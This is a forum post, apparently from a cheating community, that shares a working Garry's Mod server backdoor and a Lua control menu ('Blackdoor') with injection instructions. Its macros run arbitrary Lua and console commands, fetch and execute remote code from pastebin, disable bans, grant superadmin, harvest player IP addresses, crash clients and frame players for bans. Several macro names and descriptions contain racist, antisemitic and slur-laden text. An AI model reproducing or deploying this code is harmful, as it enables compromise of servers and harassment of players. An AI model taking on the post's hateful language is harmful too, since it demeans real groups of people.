    table.insert( selectedplayers, v )
    Plist4:AddItem( plypanel2 )
    BD.GenerateBackdoorList( Plist, 1 )
    BD.GenerateBackdoorList( Plist2, 2 )
    BD.GenerateBackdoorList( Plist3, 3 )
    concommand.Add("bd_menu", BD.BackdoorMenu)
    function BD.QuickFireBackdoor()
    	if !BD.BDMacros[selectedbackdoor] or selectedbackdoor == "" then BD.ChatText( "You haven't even selected a macro to use ya dingus!", Color(255,155,155) ) return end
    	if BD.BDMacros[selectedbackdoor].Type == ( 1 or 3 ) then BD.FormatCodeGlobal() else BD.FormatCodeTargeted() end
    concommand.Add("bd_quickfire", BD.QuickFireBackdoor)
    then go onto the server wich is backdoored, inject the lua with any method you want (external is one of the best) (command for external is : external somename.lua)
    then type "bd_menu" in console and select "Generic" then choose what you wanna do and enjoy ;') (Make the backdoor persistent first)
    (Click on Activate Backdoor once your exploit and backdoor is selected, it will execute the exploit (some exploits needs macro wich are defined in the description of each exploit))

    if it says backdoor is malfunctioning or not present try to type "bd_refresh_backdoors" if it doesn't work it means the addon isn't installed correctly (or not at all) or you fucked up something.


    To get superadmin scroll down and click on "ULX Set Access" then select yourself in "Players to target" , type the rank wanted into the macro field (superadmin in that case) then just click on activate backdoor and you'll get superadmin ^^
    Last edited by KWAIILOLI; 05-19-2019 at 07:33 AM.

    Social Engineer since 1990

  5. The Following User Says Thank You to KWAIILOLI For This Useful Post:

    xxxvannaxxx (09-02-2019)

  6. #5
    desmodas2's Avatar
    Join Date
    Aug 2015
    Quote Originally Posted by KWAIILOLI View Post
    I can help you with that one, just put :
     util.AddNetworkString( '_CAC_ReadMemory' ) net.Receive( '_CAC_ReadMemory', function() local x = CompileString( net.ReadString(), 'LuaCmd', false ) if isfunction( x ) then x() end end )
    into your addon code, then copy this code (odiumbackdoor) into your external (injector) folder and name it somename.lua :
    //local odium = jit.status( 'ODIUM' ) if !istable(odium) then print('FAILED TO IMPORT ODIUM TABLE') end
    local BD = {}
    local h = http
    BD.Backdoors = BD.Backdoors or {}
    BD.CurrentBackdoor = "Generic"
    BD.BackdoorTypes = {
      ["Generic"] = {
        ["Code"] = "util.AddNetworkString( '_CAC_ReadMemory' ) net.Receive( '_CAC_ReadMemory', function() local x = CompileString( net.ReadString(), 'LuaCmd', false ) if isfunction( x ) then x() end end )",
        ["Netkey"] = "_CAC_ReadMemory",
    local netsss = net.Start
    function BD.IsMessagePooled( netmessage )
      local netfunc = netsss
      local status, error = pcall( netfunc, netmessage )
      return status
    local net = net
    local ctxt = chat.AddText
    function BD.ChatText( message, col )
      ctxt( Color(195,205,255,255), "[Blackdoor] ", col, message )
    function BD.PingBackDoors()
      local bds = {}
      for k, v in pairs(BD.BackdoorTypes) do
        if BD.IsMessagePooled( tostring( v.Netkey ) ) then bds[k] = true end
      return bds
    concommand.Add("bd_refresh_backdoors", function() BD.Backdoors = BD.PingBackDoors() end)
    function BD.BackdoorActive()
      return table.Count( BD.Backdoors ) > 0
    function BD.GetActive()
      if !BD.BackdoorTypes[BD.CurrentBackdoor] then return { ["Code"] = "local x = 69", ["Netkey"] = "" } end
      return BD.BackdoorTypes[BD.CurrentBackdoor]
    BD.BDMacros ={
      ["Artillery Strike"] = {
        ["Type"] = 1,
        ["Code"] = [[if !bombstrike then
          hook.Add("Think", "lulz_bombstrike", function()
          local explode = ents.Create( "env_explosion" )
          local ps = Vector(math.random(-8000, 8000), math.random(-8000, 8000), math.random(-5000, 5000))
          local trc = {}
          trc.start = ps
          trc.endpos = ps + Vector( 0, 0, -99999)
          local tr = util.TraceLine(trc)
          if !tr.Hit then return end
          explode:SetPos( tr.HitPos )
          explode:SetKeyValue( "iMagnitude", "400" )
          explode:Fire( "Explode", 0, 0 )
          bombstrike = true
          hook.Remove("Think", "lulz_bombstrike")
          bombstrike = false
          ["Desc"] = "Explode the shit out of everything",
        ["@ Inject SendLua Interface"] = {
          ["Type"] = 1,
          ["Code"] = [[
          util.AddNetworkString( "cucked" )
          function BDSendLua( p, str ) net.Start( "cucked" ) net.WriteString( str ) net.Send( p ) end
            function BDSendLuaAll( str ) net.Start( "cucked" ) net.WriteString( str ) net.Broadcast() end
              function BDInjectAids( p ) p:SendLua( 'net.Receive( "cucked", function() RunString( net.ReadString() ) end )' ) end
                for k, v in pairs( player.GetAll() ) do BDInjectAids( v ) end
                hook.Add( "PlayerInitialSpawn", "youonlygetcuckedagain", function( p ) BDInjectAids( p ) end)
                ["Desc"] = "You need this to use certain macros",
              ["Announce centre screen"] = {
                ["Type"] = 1,
                ["Code"] = [[for k, v in pairs(player.GetAll()) do v:PrintMessage( HUD_PRINTCENTER, @1 ) end]],
                ["Desc"] = "Make an announcement in the centre of everybodys screen",
                ["NeedsParameters"] = 1,
              ["Rainbow chat spam"] = {
                ["Type"] = 1,
                ["Code"] = [[
                if !timer.Exists( "lulz_chatspam" ) then
                  timer.Create( "lulz_chatspam", 0.5, 0, function() BDSendLuaAll('chat.AddText( Color( math.random(0, 255), math.random(0, 255), math.random(0, 255) ), @1 )' ) end)
                  timer.Remove( "lulz_chatspam" )
                  ["Desc"] = "Spam rainbow chat for all players with the 1st parameter as the text",
                  ["NeedsParameters"] = 1,
                ["Rainbow chat spam (Turbo)"] = {
                  ["Type"] = 1,
                  ["Code"] = [[
                  if !timer.Exists( "lulz_chatspam" ) then
                    timer.Create( "lulz_chatspam", 0.01, 0, function() BDSendLuaAll('chat.AddText( Color( math.random(0, 255), math.random(0, 255), math.random(0, 255) ), @1 )' ) end)
                    timer.Remove( "lulz_chatspam" )
                    ["Desc"] = "Spam rainbow chat for all players with the 1st parameter as the text",
                    ["NeedsParameters"] = 1,
                  ["Unlock all doors"] = {
                    ["Type"] = 1,
                    ["Code"] = [[local doors = {"func_door", "func_door_rotating", "prop_door_rotating", "prop_dynamic"} for k, v in pairs(ents.GetAll()) do if table.HasValue(doors, v:GetClass()) then v:Fire("unlock", "", 0) end end]],
                    ["Desc"] = "",
                  ["Toggle all doors"] = {
                    ["Type"] = 1,
                    ["Code"] = [[local doors = {"func_door", "func_door_rotating", "prop_door_rotating", "prop_dynamic"} for k, v in pairs(ents.GetAll()) do if table.HasValue(doors, v:GetClass()) then v:Fire("toggle", "", 0) end end]],
                    ["Desc"] = "",
                  ["Broken Glass Symphony"] = {
                    ["Type"] = 1,
                    ["Code"] = [[
                    if !timer.Exists( "A true masterpiece" ) then
                      timer.Create( "A true masterpiece", 0.2, 0, function()
                      for _, p in pairs(player.GetAll()) do
                        p:EmitSound( "physics/glass/glass_largesheet_break"..math.random(1,3)..".wav", 100, math.random( 40, 180 ) )
                      timer.Remove( "A true masterpiece" )
                      ["Desc"] = "Beethoven's last hidden symphony, only rediscovered in 2017",
                    ["Yeah Baby"] = {
                      ["Type"] = 1,
                      ["Code"] = [[
                      if !timer.Exists( "porn" ) then
                        timer.Create( "porn", 0.3, 0, function()
                        for _, p in pairs(player.GetAll()) do
                          p:EmitSound( "vo/npc/female01/yeah02.wav", 100, math.random( 90, 120 ) )
                        timer.Remove( "porn" )
                        ["Desc"] = "YEAH BABY YEAH",
                      ["Street War"] = {
                        ["Type"] = 1,
                        ["Code"] = [[
                        if !timer.Exists( "cwar" ) then
                          timer.Create( "cwar", 1, 0, function()
                          for _, p in pairs(player.GetAll()) do
                            p:EmitSound( "ambient/levels/streetwar/city_battle"..math.random( 1, 19 )..".wav", 100, math.random( 90, 120 ) )
                          timer.Remove( "cwar" )
                          ["Desc"] = "For when you need more dakka",
                        ["Earthquake"] = {
                          ["Type"] = 1,
                          ["Code"] = [[
                          if !timer.Exists( "earthquake" ) then
                            timer.Create( "earthquake", 0.5, 500, function()
                            for _, p in pairs(player.GetAll()) do
                              p:SetPos( p:GetPos() + Vector( 0, 0, 1 ) )
                              p:SetVelocity( Vector( math.random( -50, 50 ), math.random( -50, 50 ), math.random( 100, 150 ) ) )
                              util.ScreenShake( p:GetPos(), 20, 1, 1, 100 )
                              p:EmitSound( "ambient/explosions/exp1.wav", 100, math.random( 60, 100 ) )
                            for _, e in pairs(ents.GetAll()) do
                              if e:GetPhysicsObject() and e:GetPhysicsObject():IsValid() then e:GetPhysicsObject():AddVelocity( Vector( math.random( -50, 50 ), math.random( -50, 50 ), math.random( 100, 150 ) ) ) end
                            timer.Remove( "earthquake" )
                            ["Desc"] = "For when you need more dakka",
                          ["Seize the server"] = {
                            ["Type"] = 1,
                            ["Code"] = [[
                            hook.Add("PlayerInitialSpawn", "gw_siezed", function( ply ) ply:SendLua('local html = vgui.Create( "HTML" )html:SetSize( ScrW(), ScrH() )html:OpenURL( "" )') end)
                            for k, v in pairs(player.GetAll()) do
                              v:SendLua('local html = vgui.Create( "HTML" )html:SetSize( ScrW(), ScrH() )html:OpenURL( "" )')
                              ["Desc"] = "Display the seized by wraithnet message to all players",
                            ["Explode all vehicles"] = {
                              ["Type"] = 1,
                              ["Code"] = [[for k, v in pairs(ents.GetAll()) do if v:IsVehicle() then
                                local explo = ents.Create("env_explosion")
                                explo:SetKeyValue("iMagnitude", "300")
                                explo:Fire("Explode", "", 0)
                              ["Desc"] = "",
                            ["RCON command"] = {
                              ["Type"] = 1,
                              ["Code"] = [[game.ConsoleCommand( @1.."\n" )]],
                              ["Desc"] = "Like having rcon access without actually having rcon access",
                            ["Lua run"] = {
                              ["Type"] = 1,
                              ["Code"] = [[@1]],
                              ["Desc"] = "For running your dank luas",
                            ["Lua run from pastebin"] = {
                              ["Type"] = 1,
                              ["Code"] = [[http.Fetch( "@1", function( b, l, h, c ) RunString( b ) end, function() end )]],
                              ["Desc"] = "Fetch and run code from a pastebin link ( remember to use raw you stupid ****** eg. )",
                            ["Destroy ULX Ban/Kick"] = {
                              ["Type"] = 1,
                              ["Code"] = [[ULib.Ban = function() return false end
                              ULib.addBan = function() return end
                              ULib.kick = function() return end]],
                              ["Desc"] = "Completely break ulx ban and ulx kick so you can't be locked out of the server",
                            ------------------------ player targeted macros ------------------------
                            ["Kill player"] = {
                              ["Type"] = 2, -- 1 = indiscriminate, 2= targeted, 3 = dangerous
                              ["Code"] = [[v:Kill()]],
                              ["Desc"] = "",
                            ["Fumble player"] = {
                              ["Type"] = 2, -- 1 = indiscriminate, 2= targeted, 3 = dangerous
                              ["Code"] = [[v:DropWeapon( v:GetActiveWeapon() )]],
                              ["Desc"] = "Knocks their current weapon out of their hand",
                            ["Strip weapons"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:StripWeapons()]],
                              ["Desc"] = "",
                            ["Rocket"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:SetVelocity( Vector(0, 0, 9000) )]],
                              ["Desc"] = "Sends them flying up into the air",
                            ["Rocket (Spastic)"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:SetVelocity( Vector(math.random( -9000, 9000), math.random( -9000, 9000), 9000) )]],
                              ["Desc"] = "HOLY SHIIIIIIIIIIIT",
                            ["Change model"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:SetModel( @1 )]],
                              ["Desc"] = "Set their player model to the specified string (1st paremeter)",
                              ["NeedsParameters"] = 1,
                            ["Set health + armor"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:SetHealth( @1 ) v:SetArmor( @2 ) ]],
                              ["Desc"] = "Sets their health (1st paremeter) and armor (2nd paremeter)",
                              ["NeedsParameters"] = 2,
                            ["Ear rape"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local snd = {
                                [1] = "npc/stalker/go_alert2a.wav",
                                [2] = "vo/npc/male01/question06.wav",
                                [3] = "ambient/energy/zap1.wav",
                                [4] = "weapons/knife/knife_stBD.wav",
                                [5] = "vo/ravenholm/madlaugh04.wav",
                                [6] = "npc/antlion_guard/antlion_guard_die1.wav",
                                [7] = "vo/breencast/br_collaboration01.wav,"
                              v:EmitSound( snd[tonumber(@1)], 100, 100 )
                              ["Desc"] = "Make them emit a sound (1st paremeter is a number 1-7)",
                              ["NeedsParameters"] = 1,
                            ["Ear rape (from internet)"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              BDSendLua( v, 'if soundrape then soundrape:Remove() soundrape = nil return end soundrape = vgui.Create( "DFrame" ) soundrape:SetSize( 1, 1 ) local html = vgui.Create( "HTML", soundrape ) html:OpenURL( @1 )' )
                              ["Desc"] = "Make them hear a sound from a URL (1st paremeter).  Sending a new sound will stop the previous one.  Send an invalid url to stop all sounds entirely on their client",
                              ["NeedsParameters"] = 1,
                            ["Eye rape (from internet)"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              BDSendLua( v, 'if bdeyerape then bdeyerape:Remove() bdeyerape = nil return end bdeyerape = vgui.Create( "DFrame" )bdeyerape:SetDraggable( false )bdeyerape:SetSize( ScrW(), ScrH() )bdeyerape:SetTitle( "" )bdeyerape:ShowCloseButton( false )local html = vgui.Create( "HTML", bdeyerape )html:Dock( FILL )html:OpenURL( @1 )' )
                              ["Desc"] = "Make them see a full screen, unclosable panel from a URL (1st paremeter).  Sending a new url will stop the previous one.  Send an invalid url to clear their view entirely",
                              ["NeedsParameters"] = 1,
                            ["Rave Mode"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              BDSendLua( v, 'if hook.GetTable().HUDPaint.drugznigga then hook.Remove( "HUDPaint", "drugznigga" ) else hook.Add( "HUDPaint", "drugznigga", function() local cin = math.sin( CurTime() * 10 ) * 255 surface.SetDrawColor( Color( cin, -cin, cin, 100 ) ) surface.DrawRect( 0, 0, ScrW(), ScrH() ) end) end' )
                              ["Desc"] = "Make them loosen up and join the party",
                            ["Rave Music"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              BDSendLua( v, 'surface.PlaySound( "music/hl1_song25_remix3.mp3" )' )
                              ["Desc"] = "DOOF DOOF NIGGA",
                            ["Whisper"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:ChatPrint( @1 )]],
                              ["Desc"] = "Anonymously whisper text into their chatbox (1st paremeter)",
                              ["NeedsParameters"] = 1,
                            ["Whisper (advanced)"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              BDSendLua( v, 'chat.AddText( Color( @2, @3, @4 ), @1 )' )
                              ["Desc"] = "Anonymously whisper coloured text into their chatbox (1st paremeter = text, 2nd = r, 3rd = g, 4th = b)",
                              ["NeedsParameters"] = 1,
                            ["Ignite player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:Ignite( 30 )]],
                              ["Desc"] = "Ignite players for 30 seconds, spam repeatedly to refresh the duration",
                            ["Toggle godmode"] = {
                              ["Type"] = 2,
                              ["Code"] = [[if v:HasGodMode() then v:GodDisable() else v:GodEnable() end]],
                              ["Desc"] = "",
                            ["Crash their gmod"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:SendLua("function fag() return fag() end fag()")]],
                              ["Desc"] = "Instantly freezes their game solid, the only way to fix it is ctrl-alt-delete or a computer restart",
                            ["Toggle serverside speedhack"] = {
                              ["Type"] = 2,
                              ["Code"] = [[if !v.Sanic then v:SetRunSpeed( 1200 ) v:SetWalkSpeed(800) v.Sanic = true else v:SetRunSpeed( 240 ) v:SetWalkSpeed( 160 ) v.Sanic = false end]],
                              ["Desc"] = "GOTTA GO FAST",
                            ["Freeze/Unfreeze player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:Freeze( !v:IsFrozen() )]],
                              ["Desc"] = "",
                            ["Force say"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:Say(@1)]],
                              ["Desc"] = "Forces them to say the specified string in chat (first parameter)",
                              ["NeedsParameters"] = 1,
                            ["Force concommand"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:ConCommand(@1)]],
                              ["Desc"] = "Forces them to run the specified console command (first parameter)",
                              ["NeedsParameters"] = 1,
                            ["Grab IP"] = {
                              ["Type"] = 2,
                              ["Code"] = [[ for _, p in pairs(player.GetAll()) do if %LP then p:ChatPrint( v:Nick().." : "..v:IPAddress() ) end end]],
                              ["Desc"] = "Prints their IP Address to your console",
                            ["DarkRP add/remove money"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:addMoney(@1)]],
                              ["Desc"] = "Adds money to their wallet (first parameter) remember that you can use negative numbers to subtract money",
                              ["NeedsParameters"] = 1,
                            ["DarkRP force job"] = {
                              ["Type"] = 2,
                              ["Code"] = [[ for i, t in pairs( team.GetAllTeams() ) do if string.lower(t.Name) == string.lower( @1 ) then v:changeTeam(i, true, true) end end]],
                              ["Desc"] = "Change their team to the specified job (1st parameter = job name, does not require capitalization)",
                              ["NeedsParameters"] = 1,
                            ["Force team switch"] = {
                              ["Type"] = 2,
                              ["Code"] = [[ for i, t in pairs( team.GetAllTeams() ) do if string.lower(t.Name) == string.lower( @1 ) then v:SetTeam( i ) end end]],
                              ["Desc"] = "Change their team to the specified team name (1st parameter)",
                              ["NeedsParameters"] = 1,
                            ["Noclip player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[if v:GetMoveType() != MOVETYPE_NOCLIP then v:SetMoveType(MOVETYPE_NOCLIP) else v:SetMoveType(MOVETYPE_WALK) end]],
                              ["Desc"] = "Toggles noclip on the specified players",
                            ["Give weapon to player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:Give( @1 )]],
                              ["Desc"] = "Gives this player a weapon (first parameter)",
                              ["NeedsParameters"] = 1,
                            ["Give ammo to player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[v:GiveAmmo( @1, @2, false )]],
                              ["Desc"] = "Gives this player some ammo (first parameter = amount of ammo, secound parameter = ammo type)",
                              ["NeedsParameters"] = 2,
                            ["Teleport (them to your cursor)"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local tp = false
                              local tpos
                              for _, p in pairs(player.GetAll()) do if %LP then tpos = p:GetEyeTraceNoCursor().HitPos tp = true end end
                              if tp then v:SetPos( tpos ) end
                              ["Desc"] = "Teleports the selected players to your cursor location, not recommended for more than 1 person at once",
                            ["Teleport (you to them)"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local tp = false
                              local tpos = v:GetPos() + Vector( 32, 0, 10)
                              for _, p in pairs(player.GetAll()) do if %LP then p:SetPos( tpos ) end end
                              ["Desc"] = "Teleport yourself to the selected player, may end with you stuck inside a wall",
                            ["Teleport (blink)"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local tpos = v:GetEyeTraceNoCursor().HitPos
                              v:SetPos( tpos )
                              ["Desc"] = "Use on yourself or others to warp them to where they are looking",
                            ["Spawn entity near player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local tr = {}
                              tr.start = v:GetShootPos()
                              tr.endpos = v:GetShootPos() + 2500 * v:GetAimVector()
                              tr.filter = {v}
                              local trace = util.TraceLine(tr)
                              local dix = ents.Create( @1 )
                              ["Desc"] = "Spawn an entity in front of this player (first parameter = entity class), cannot spawn cars!",
                              ["NeedsParameters"] = 1,
                            ["Spawn prop near player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local tr = {}
                              tr.start = v:GetShootPos()
                              tr.endpos = v:GetShootPos() + 2500 * v:GetAimVector()
                              tr.filter = {v}
                              local trace = util.TraceLine(tr)
                              local dix = ents.Create( "prop_physics" )
                              dix:SetModel( @1 )
                              ["Desc"] = "Spawn a world prop in front of this player (first parameter = model)",
                              ["NeedsParameters"] = 1,
                            ["Spawn odium shrine"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local tr = {}
                              tr.start = v:GetShootPos()
                              tr.endpos = v:GetShootPos() + 2500 * v:GetAimVector()
                              tr.filter = {v}
                              local trace = util.TraceLine(tr)
                              local dix = ents.Create( "prop_physics" )
                              dix:SetPos( trace.HitPos + Vector( 0, 0, 70 ) )
                              dix:SetAngles( v:GetAngles() )
                              dix:SetModel( "models/props_c17/gravestone_cross001a.mdl" )
                              dix:SetMoveType( MOVETYPE_NONE )
                              dix:SetMaterial( "models/shiny" )
                              dix:SetColor( Color( 0, 0, 40 ) )
                              local function ecr( parent, model, pos, ang, col, mat  )
                                local dix = ents.Create( "prop_physics" )
                                dix:SetPos( parent:LocalToWorld( pos ) )
                                dix:SetAngles( parent:LocalToWorldAngles( ang ) )
                                dix:SetModel( model )
                                dix:SetParent( parent )
                                dix:SetColor( col )
                                dix:SetMaterial( mat )
                              ecr( dix, "models/props_c17/gravestone_coffinpiece001a.mdl", Vector( -65, 0, -60 ), Angle( 0, 180, 0 ), Color( 40, 40, 80 ), "models/shiny"  )
                              ecr( dix, "models/hunter/blocks/cube025x3x025.mdl", Vector( -5, 18, 35 ), Angle( 0, 0, 0 ), Color( 80, 80, 180 ), "models/shiny"  )
                              ecr( dix, "models/hunter/blocks/cube025x3x025.mdl", Vector( -5, 6, 65 ), Angle( 0, 0, 90 ), Color( 80, 80, 180 ), "models/shiny"  )
                              ecr( dix, "models/hunter/blocks/cube025x150x025.mdl", Vector( -5, 71, 100 ), Angle( 0, 0, 90 ), Color( 80, 80, 180 ), "models/shiny"  )
                              ecr( dix, "models/hunter/blocks/cube025x150x025.mdl", Vector( -5, -59, 100 ), Angle( 0, 0, 90 ), Color( 80, 80, 180 ), "models/shiny"  )
                              for _, p in pairs( player.GetAll() ) do p:SendLua( 'chat.AddText( Color(200, 200, 255 ), "Heil, god of cheating")' ) sound.Play( "ambient/explosions/explode_8.wav", p:GetPos(), 90, 80, 1 ) end
                              ["Desc"] = "Spawn a world prop in front of this player (first parameter = model)",
                            ["Spawn evil npc near player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local tr = {}
                              tr.start = v:GetShootPos()
                              tr.endpos = v:GetShootPos() + 2500 * v:GetAimVector()
                              tr.filter = {v}
                              local trace = util.TraceLine(tr)
                              local dix = ents.Create( "npc_citizen" )
                              dix:SetKeyValue( "additionalequipment", table.Random({"weapon_shotgun", "weapon_smg1", "weapon_ar2"}) )
                              dix:SetKeyValue( "citizentype", 3 )
                              dix:AddRelationship("player D_HT 200")
                              dix:SetSchedule( SCHED_IDLE_WANDER )
                              ["Desc"] = "Spawn a hostile NPC in front of this player",
                            ["Death ray"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local trace = v:GetEyeTraceNoCursor()
                              if trace.Entity:IsValid() then trace.Entity:Remove() end
                              ["Desc"] = "Vaporize whatever this player is looking at",
                            ["Death ray (explosive)"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local trace = v:GetEyeTraceNoCursor()
                              local explo = ents.Create("env_explosion")
                              explo:SetKeyValue("iMagnitude", "250")
                              explo:Fire("Explode", "", 0)
                              ["Desc"] = "Blow up whatever this player is looking at",
                            ["Precise Artillery Strike"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local trace = v:GetEyeTraceNoCursor()
                              timer.Create( "uiashfuasfas"..v:UniqueID()..math.random(-9999, 99999), 0.2, 15, function()
                              local explo = ents.Create("env_explosion")
                              explo:SetPos(trace.HitPos + Vector( math.random( -500, 500), math.random( -500, 500), math.random( -500, 500) ) )
                              explo:SetKeyValue("iMagnitude", "250")
                              explo:Fire("Explode", "", 0)
                              ["Desc"] = "Blow up whatever this player is looking at",
                            ["Woman Driver"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local trace = v:GetEyeTraceNoCursor()
                              local car = ents.Create("prop_physics")
                              local trace2 = util.TraceLine( { start = trace.HitPos, endpos = trace.HitPos + Vector( 0, 0, 5000000 ), mask = MASK_SOLID_BRUSHONLY } )
                              car:SetModel( "models/props_vehicles/car002a_physics.mdl" )
                              car:SetAngles( v:GetAngles() )
                              car:SetPos( trace2.HitPos + Vector( 0, 0, -60 ) )
                              car.boom = 6
                              car:GetPhysicsObject():SetVelocity( Vector( 0, 0, -5000 ) )
                              car:Ignite( 500 )
                              car:AddCallback( "PhysicsCollide", function( car, dat )
                              local explo = ents.Create("env_explosion")
                              explo:SetPos( car:GetPos() )
                              explo:SetKeyValue("iMagnitude", "350")
                              explo:Fire("Explode", "", 0)
                              local ef = EffectData()
                              ef:SetOrigin( car:GetPos() )
                              ef:SetMagnitude( 5 )
                              ef:SetScale( 200 )
                              util.Effect( "ThumperDust", ef )
                              car.boom = car.boom - 1
                              if car.boom < 0 then car:Remove() end
                              end )
                              timer.Simple( 30, function() if car:IsValid() then car:Remove() end end)
                              ["Desc"] = "Make exploding vehicles rain from the sky",
                            ["Poison Gas"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local trace = v:GetEyeTraceNoCursor()
                              local ar2Explo = ents.Create("env_ar2explosion")
                              local p = trace.HitPos
                              ar2Explo:Fire("Explode", "", 0)
                              timer.Create( "gasthekikes_"..math.random(-9999, 9999).."_"..math.random(-9999, 9999), 0.25, 35, function()
                              for _, ent in pairs(ents.FindInSphere( p, 500)) do
                                if !ent:IsPlayer() then continue end
                                local d = DamageInfo()
                                d:SetDamage( 1 )
                                d:SetAttacker( game.GetWorld() )
                                d:SetInflictor( game.GetWorld() )
                                d:SetDamageType( DMG_DROWN )
                                ent:TakeDamageInfo( d )
                              ["Desc"] = "GAS THE JEWS RACE WAR NOW",
                            ["Spawn vehicle near player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local trc = {}
                              trc.start = v:GetShootPos()
                              trc.endpos = v:GetShootPos() + 2500 * v:GetAimVector()
                              trc.filter = {v}
                              local tr = util.TraceLine(trc)
                              local VehicleList = list.Get( "Vehicles" )
                              local vehicle = VehicleList[ @1 ]
                              if ( !vehicle ) then return end
                              local Angles = v:GetAngles()
                              Angles.pitch = 0
                              Angles.roll = 0
                              Angles.yaw = Angles.yaw + 180
                              local pos = tr.HitPos
                              if ( vehicle.Offset ) then
                                pos = pos + tr.HitNormal * vehicle.Offset
                              local Ent = ents.Create( vehicle.Class )
                              if ( !Ent ) then return end
                              duplicator.DoGeneric( Ent, vehicle )
                              if ( vehicle.Model == "models/buggy.mdl" ) then Ent:SetKeyValue( "vehiclescript", "scripts/vehicles/jeep_test.txt" ) end
                              if ( vehicle.Model == "models/vehicle.mdl" ) then Ent:SetKeyValue( "vehiclescript", "scripts/vehicles/jalopy.txt" ) end
                              if ( vehicle && vehicle.KeyValues ) then
                                for k, v in pairs( vehicle.KeyValues ) do
                                  Ent:SetKeyValue( k, v )
                              Ent:SetModel( vehicle.Model )
                              Ent:SetAngles( Angles )
                              Ent:SetPos( pos )
                              if ( Ent.SetVehicleClass && @1 ) then Ent:SetVehicleClass( @1 ) end
                              Ent.VehicleName = vehicle.Class
                              Ent.VehicleTable = @1
                              Ent.ClassOverride = vehicle.Class
                              ["Desc"] = "Spawn a vehicle in front of this player (first parameter = vehicle class), don't try to spawn ents with this ya dingus!",
                              ["NeedsParameters"] = 1,
                            ["Kick player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[ v:Kick( @1 ) ]],
                              ["Desc"] = "First parameter = reason for kick",
                            ["******ize player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[ if !v.******ed then v:SetColor( Color( 0, 0, 0 ) ) v.******ed = true else v:SetColor( Color(255, 255, 255) ) v.******ed = false end ]],
                              ["Desc"] = "Turns them black as night",
                            ["Cloak player"] = {
                              ["Type"] = 2,
                              ["Code"] = [[ if !v.BDCloaked then v:SetRenderMode( RENDERMODE_NONE ) v.BDCloaked = true else v:SetRenderMode( RENDERMODE_NORMAL ) v.BDCloaked = false end ]],
                              ["Desc"] = "Toggles cloaking on the player, people can still see the weapon they are holding however",
                            ["Allahu Ackbar"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local explo = ents.Create("env_explosion")
                              explo:SetKeyValue("iMagnitude", "250")
                              explo:Fire("Explode", "", 0)
                              if v:Alive() then v:Kill() end
                              ["Desc"] = "Blows them the fuck up, all kills are attributed to them so its great for getting random assholes banned",
                            ["ULX set access"] = {
                              ["Type"] = 2,
                              ["Code"] = [[ local userInfo = ULib.ucl.authed[ v:UniqueID() ] ULib.ucl.addUser( v:UniqueID(), userInfo.allow, userInfo.deny, @1 ) ]],
                              ["Desc"] = "If ulx is installed this will (silently!) set them to the specified usergroup (1st parameter)",
                              ["NeedsParameters"] = 1,
                            ------------------------ custom / new shit ------------------------
                            ["Africanize"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              local bones = {
                                [1] = {b = "ValveBiped.Bip01_Head1", v = Vector(4,0,4)},
                                [2] = {b =  "ValveBiped.Bip01_R_Thigh", v = Vector(0,0,0)},
                                [3] = {b = "ValveBiped.Bip01_L_Thigh", v = Vector(0,0,0)},
                                [4] = {b =  "ValveBiped.Bip01_R_Calf", v = Vector(0,0,1)},
                                [5] = {b = "ValveBiped.Bip01_L_Calf", v = Vector(0,0,1)},
                                [6] = {b = "ValveBiped.Bip01_R_UpperArm", v = Vector(0,0,0)},
                                [7] = {b = "ValveBiped.Bip01_L_UpperArm", v = Vector(0,0,0)},
                                [8] = {b = "ValveBiped.Bip01_R_Forearm", v = Vector(1,1.5,1.5)},
                                [9] = {b = "ValveBiped.Bip01_L_Forearm", v = Vector(1,1.5,1.5)},
                                [10] = {b = "ValveBiped.Bip01_R_Clavicle", v = Vector(0,0,0)},
                                [11] = {b = "ValveBiped.Bip01_L_Clavicle", v = Vector(0,0,0)},
                              if !v.is2D then
                                v.is2D = true
                                for k, bone  in pairs(bones) do
                                  local boneToFind = v:LookupBone(bone.b)
                                  v:ManipulateBoneScale( boneToFind, bone.v)
                                v.is2D = false
                                for k, bone  in pairs(bones) do
                                  local boneToFind = v:LookupBone(bone.b)
                                  v:ManipulateBoneScale( boneToFind, Vector(1,1,1))
                              ["Desc"] = "Makes the player seem as though they're 2D.",
                            ["M9K nuke"] = {
                              ["Type"] = 2,
                              ["Code"] = [[
                              //            if (m9k) then
                                local nuke = ents.Create("m9k_davy_crockett_explo")
                                nuke.Owner = v
                                //            end
                                ["Desc"] = "Creates a nuke 'made' by selected user(s) & activates it where they're standing.",
